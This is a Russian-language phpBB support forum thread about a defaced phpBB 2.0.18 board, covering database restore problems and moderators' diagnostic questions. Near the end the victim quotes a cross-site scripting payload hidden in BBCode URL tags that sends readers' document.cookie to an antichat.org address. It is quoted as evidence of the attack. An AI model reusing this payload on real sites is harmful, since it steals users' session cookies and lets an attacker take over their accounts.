Взломали 2.0.18
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
Взломали 2.0.18
Пришел утром на форум а там написано " Hacked by....."
Форум последней версии - 2.0.18. Никаких модов не стояло, кроме "Быстрого ответа" и "внешний вид - PS2". Может кто поможет советом, как избежать подобных "радостей"? Посмотрел на файлы - ничего лишнего пока не нашел ( может удалили).
Форум последней версии - 2.0.18. Никаких модов не стояло, кроме "Быстрого ответа" и "внешний вид - PS2". Может кто поможет советом, как избежать подобных "радостей"? Посмотрел на файлы - ничего лишнего пока не нашел ( может удалили).
-
- phpBB Guru
- Сообщения: 5484
- Стаж: 21 год 2 месяца
- Поблагодарили: 2 раза
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
Форум был 2.0.17 Обновил так - скопировал файлы обновления 2.0.18 в каталог с форумом, запустил файл update_to_latest.php.
А сейчас не могу восстановить базу! Пишет Warning: upload_max_filesize of 2097152 bytes exceeded - file [backup_file=E:\phpBB2\phpbb_db_backup.sql] not saved in Unknown on line 0
Файл на диске занимает 5 Мег. Я так понял, что максимально возможный развер фала 2Мега. Как увеличить до 5? Спасибо.
Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел, удалили форумы и написали " свой привет". Лишних файлов не нашел. Либо их не было, либо удалили.
А сейчас не могу восстановить базу! Пишет Warning: upload_max_filesize of 2097152 bytes exceeded - file [backup_file=E:\phpBB2\phpbb_db_backup.sql] not saved in Unknown on line 0
Файл на диске занимает 5 Мег. Я так понял, что максимально возможный развер фала 2Мега. Как увеличить до 5? Спасибо.
Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел, удалили форумы и написали " свой привет". Лишних файлов не нашел. Либо их не было, либо удалили.
-
- Former team member
- Сообщения: 4463
- Стаж: 20 лет 6 месяцев
- Поблагодарили: 1 раз
Поздравляю вас - вы обновили только БД.bas писал(а):скопировал файлы обновления 2.0.18 в каталог с форумом, запустил файл update_to_latest.php.
Никогда не пробовали читать документацию, а? К тому же обновлению, а?
Добавлено спустя 1 минуту 26 секунд:
Вы слегка подумайте над тем что пишете. Как можно залезть в админку не будучи админом?bas писал(а):Самая вероятная версия - получения прав админа! Видимо залезли в администраторский раздел
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
VVVas
А как залезали в предудущих версиях? Если были косяки в куках/сессиях? Просто подменяли их - и все!
А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!
Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?
А как залезали в предудущих версиях? Если были косяки в куках/сессиях? Просто подменяли их - и все!
А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!
Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?
-
- Former team member
- Сообщения: 4463
- Стаж: 20 лет 6 месяцев
- Поблагодарили: 1 раз
Читайте об этом сами - я не собираюсь вам это пересказывать.bas писал(а):А как залезали в предудущих версиях?
Может просто пожалели. Либо базу пользователей с мылами утянули и спамерам слили. Если с вашей точки зрения что-то бессмыслено - попробуйте думать с другой точки зрения, а так же расширьте уровень своего восприятия и не отбрасывайте некоторые факты. И с чего вы взяли что не напихали?bas писал(а):А про админский раздел я сказал потому, что кроме удаления форумов ничего сделать не смогли ( или не сумели), даже в базу не залезли (не уверен, но есть такое предположение). Обычно, если влезают " как следует", то "напихают" разных ПХП-шеллов и прочих "радостей". а тут нет...только в админском отделе побывали..и все!
Идите в поиск - обсуждалось.bas писал(а):Помогите базу восcтановить? Как SQL-файл больше 2 Мег залить?
http://www.phpbbguru.net/community/viewtopic.php?t=861
Тема закрыта.
PS Вот так и получается что форум дырявый - руки просто у некоторых дырявые.
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
Взломали 2.0.18 часть 2
Удалил форум! ВСЕ!!! Оставил только базы! Скачал последний дистрибутив! Установил. Восстановил базу данных! Через час - опять надпись " Типа хакнули". Ну, что скажете?
Вот кстати об этом написано тут - http://adminam.net Речь идет про мой форум http://chat.ntsi1.com/forum
Вот кстати об этом написано тут - http://adminam.net Речь идет про мой форум http://chat.ntsi1.com/forum
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 10 месяцев
- Откуда: Бердск
оставили помоему вам гдето файлик, через который вас имеют.. проверьте все файлы, которые лежат на фтп.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
-
- Former team member
- Сообщения: 4463
- Стаж: 20 лет 6 месяцев
- Поблагодарили: 1 раз
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
-
- Former team member
- Сообщения: 582
- Стаж: 20 лет 3 месяца
- Откуда: Москва
Код: Выделить всё
bool setcookie ( string name [, string value [, int expire [, string path [, string domain [, bool secure]]]]] )
Если вы действительно хотите выяснить что происходит, ответьте сначала на вопросы:http://php.rinet.ru/manual/ru/function.setcookie.php писал(а):secure - Indicates that the cookie should only be transmitted over a secure HTTPS connection. When set to TRUE, the cookie will only be set if a secure connection exists. The default is FALSE
1) вы знаете этого человека Slash [IFF]? не живет ли он где-то недалеко от вас и не подключен ли к той же сети что и вы?
2) код форума вы залили с нуля, а базу восстановили старую? проверяли ли вы ее перед восстановлением на локальном хосте на нежелательные вложения?
3) в какой момент и как именно вы проверяли "левых админов"?
4) какие моды были установлены когда ваш форум был 2.0.17 (ну тоесть до того как вы полностью перезалили новый код)?
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
-
- Former team member
- Сообщения: 582
- Стаж: 20 лет 3 месяца
- Откуда: Москва
CJ John PM, написано же:
bas писал(а):"Левых" админов проверил сразу..пароль сменил....
выделенный сервер по цене обычного хостинга - менее 150 рублей в месяц
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
Благодарности принимаются в Яндекс.Деньгах на счет 4100143316948
-
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 2 месяца
Вчера отмечали НГ, было не до него (Slash [IFF]). А вот сегодня посмотрел за ним...Вот что он писал:
1) Хм...
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url} Видно только "Хм..."
2) Всех с Новым Годом!
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url}
В общем, ничего нового....залезают через дырки в форуме... Я же говорил черезе куки! :-) Эх phpBB phpBB.....
CJ John Этот хрен в юзерах сидит...Админских прав у него нет. Я пока его оставил, в какой то степени он мне помогает. Всех с новым годом!
1) Хм...
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url} Видно только "Хм..."
2) Всех с Новым Годом!
{url}http://www..src="http://antichat.org/s/skynet.gif?"+document.cookie;) ]wj{/url}
В общем, ничего нового....залезают через дырки в форуме... Я же говорил черезе куки! :-) Эх phpBB phpBB.....
CJ John Этот хрен в юзерах сидит...Админских прав у него нет. Я пока его оставил, в какой то степени он мне помогает. Всех с новым годом!
-
- Former team member
- Сообщения: 6517
- Стаж: 20 лет 10 месяцев
- Откуда: Бердск
bas
вообщето это глюк ИЕ, потому как больше нигде этот код не работает.
вообщето это глюк ИЕ, потому как больше нигде этот код не работает.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса